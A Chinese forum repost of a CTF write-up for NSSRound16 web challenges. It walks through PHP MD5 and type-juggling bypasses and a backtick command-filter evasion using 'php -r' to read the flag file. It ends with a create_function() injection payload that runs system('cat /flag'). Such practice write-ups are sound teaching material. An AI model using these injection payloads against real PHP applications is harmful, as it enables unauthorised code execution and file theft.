拉不拉稀肚拉稀 发表于 2024-4-23 23:09:13

NSSRound16

NSSRound16

RCE但是没有完全RCE

审题

https://img2023.cnblogs.com/blog/3369564/202402/3369564-20240204132653628-1494085144.png
审核代码,简单的md5绕过。
知识点

md5绕过,命令组合,shell里``中的内容会被当成代码执行
知识详解


[*]md5等于的绕过方法

[*]数组绕过 a[]=1&b[]=2,
[*]0e绕过弱比较,md5后的值以0e开头即可绕过。
[*]$a==md5 $a=0e215962017其md5后的值也为0e开头
[*]md5碰撞绕过强比较。
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

解题


[*]md5碰撞绕过md5_1和2,数组绕过md5_3
https://img2023.cnblogs.com/blog/3369564/202402/3369564-20240204133840015-339484453.png

[*]进入新目录。
https://img2023.cnblogs.com/blog/3369564/202402/3369564-20240204134031890-1636615902.png
审核代码禁用了一些字母符号,并且将shell和cmd构成了一个可执行函数
使用dir观察题目内容
https://img2023.cnblogs.com/blog/3369564/202402/3369564-20240204134821289-1291323147.png
找到flag,cat命令被禁言使用more命令。
并且由于``中内容会被当成代码执行使用php -r,快速执行一些php代码。
所以构造的cmd为
cmd=cd /;more `php -r "echo chr(102).chr(108).chr(97).chr(103);"`https://img2023.cnblogs.com/blog/3369564/202402/3369564-20240204135450049-2000341848.png
了解过PHP特性吗

审题

https://img2023.cnblogs.com/blog/3369564/202402/3369564-20240204135648479-85938901.png
进行代码审计后,总的来说就是让checker1,2,3,4都为ture
知识点

php函数的应用。
解题


[*]绕过checker1
$num = $_GET['num'];
if (preg_match("//", $num)) {
    die("no!!");
}
if (intval($num)) {
    $checker_1 = TRUE;
} 只要让num中匹配不到数字并让intval=1即可。直接用数组绕过
num[]=1
[*]绕过checker2
if (isset($_POST['ctype']) && isset($_POST['is_num'])) {
    $ctype = strrev($_POST['ctype']);
    $is_num = strrev($_POST['is_num']);
    if (ctype_alpha($ctype) && is_numeric($is_num) && md5($ctype) == md5($is_num)) {
      $checker_2 = TRUE;
    }
} md5弱比较,0e 绕过。
注意strrev()函数,反转函数将字符串前后反转。
构造:ctype=TDNHTLQ&is_num=807016042
[*]绕过checker3。
$_114 = $_GET['114'];
$_514 = $_POST['514'];
if (isset($_114) && intval($_114) > 114514 && strlen($_114) <= 3) {
    if (!is_numeric($_514) && $_514 > 9999999) {
      $checker_3 = TRUE;
    }
} 直接构造:114=1e9&514=9999999999999999a即可。
[*]绕过checker4
$arr4y = $_POST['arr4y'];
if (is_array($arr4y)) {
    for ($i = 0; $i < count($arr4y); $i++) {
      if ($arr4y[$i] === "NSS") {
            die("no!");
      }
      $arr4y[$i] = intval($arr4y[$i]);
    }
    if (array_search("NSS", $arr4y) === 0) {
      $checker_4 = TRUE;
    }
} 首先arr4y[]!=NSS,然后array_search函数是弱比较,如果为数字,则NSS比较后输出0,如果为字符串则输出false。
所以,构造:arr4y[]=0.
得到下一页目录
https://img2023.cnblogs.com/blog/3369564/202402/3369564-20240204141850984-429114154.png
https://img2023.cnblogs.com/blog/3369564/202402/3369564-20240204142040417-1167798837.png
注意create_function()函数
$B='echo $A;'
create_function($A,$B) //的输出结果相当于
   
   
   
   function lambda_1($A){
    echo $A;
}所以,传入nss=return;}system('cat /flag');/*&shell=时
相当于:
creat_function($shell,$nss);

function lambda_1($shell,$nss){
    return;}system('cat /flag');/*
}所以,得到flag。
https://img2023.cnblogs.com/blog/3369564/202402/3369564-20240204145028254-532564155.png

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页: [1]
查看完整版本: NSSRound16